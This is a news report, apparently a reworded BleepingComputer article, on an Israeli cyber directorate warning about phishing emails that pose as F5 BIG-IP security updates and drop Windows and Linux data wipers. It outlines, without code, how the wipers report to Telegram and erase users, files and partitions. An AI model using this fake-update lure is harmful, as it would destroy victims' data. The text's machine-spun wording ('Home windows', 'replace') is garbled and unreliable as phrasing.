The Israel Nationwide Cyber Directorate warns of phishing emails pretending to be F5 BIG-IP zero-day security updates that deploy Home windows and Linux information wipers.
Israel’s Nationwide Cyber Directorate (INCD) acts because the CERT accountable for defending the nation from cyber threats and to warn organizations and residents about identified assaults.
Since October, Israel has been closely focused by pro-Palestinian and Iranian hacktivists, who’ve been conducting information theft and data-wiping assaults on organizations within the nation.
In November, a new information wiper referred to as BiBi Wiper was found that focused each Linux and Home windows units and is believed to have been created by pro-Hamas hacktivists.
Faux F5 replace deploys wiper
Yesterday, INCD warned of a brand new phishing assault deploying information wipers via emails pretending to be a warning a few zero-day vulnerability in F5 BIG-IP units.
A professional-Palestinian hacktivist group named Handala advised BleepingComputer that they have been accountable for the phishing assault, stating it was deployed on quite a few Israeli networks. BleepingComputer has not been in a position to verify these claims independently.
The phishing e mail warns that the F5 BIG-IP zero-day vulnerability is actively exploited in assaults, urging Israeli organizations to obtain and set up a security replace earlier than their community is breached.
Supply: INCD
For Home windows customers, the e-mail pushes an executable named F5UPDATER.exe [VirusTotal], and for Linux, the file is a shell script named replace.sh [VirusTotal].
When launched, each the Home windows and Linux variations try to impersonate an F5 security replace by displaying the corporate’s emblem on the display.
For instance, the Home windows wiper will show a small display branded with the F5 emblem that pretends to be a security replace installer.
Source: BleepingComputer
When the Replace button is clicked, the wiper will ship a message containing the data above the gadget to a Telegram channel and try to wipe all the info from the pc.
Nevertheless, in BleepingComputer’s exams, the wiper is a bit buggy, not deleting all the information on a pc.
The Linux wiper is a shell script that first downloads the packages essential to wipe the pc, that are xfsprogs, wipe, and parted.
Supply: BleepingComputer
These packages are used first to take away all customers on the system after which use the ‘wipe’ command to delete the related house instructions.
The wiper will then try to delete all working system information and the partitions on the Linux gadget. When executed, the Linux pc is rebooted to trigger the partition adjustments to enter impact.
Just like the Home windows wiper, the Linux model will talk with a Telegram channel to supply details about the gadget and standing updates.
Data wipers have develop into a large downside for Israel, with hacktivists generally utilizing them in harmful assaults to disrupt Israel’s operations and financial system.
As all the time, the perfect protection is barely to obtain information from e mail if they arrive from a trusted and confirmed supply. Moreover, security updates ought to solely be downloaded immediately from a {hardware} vendor, not third-party websites.
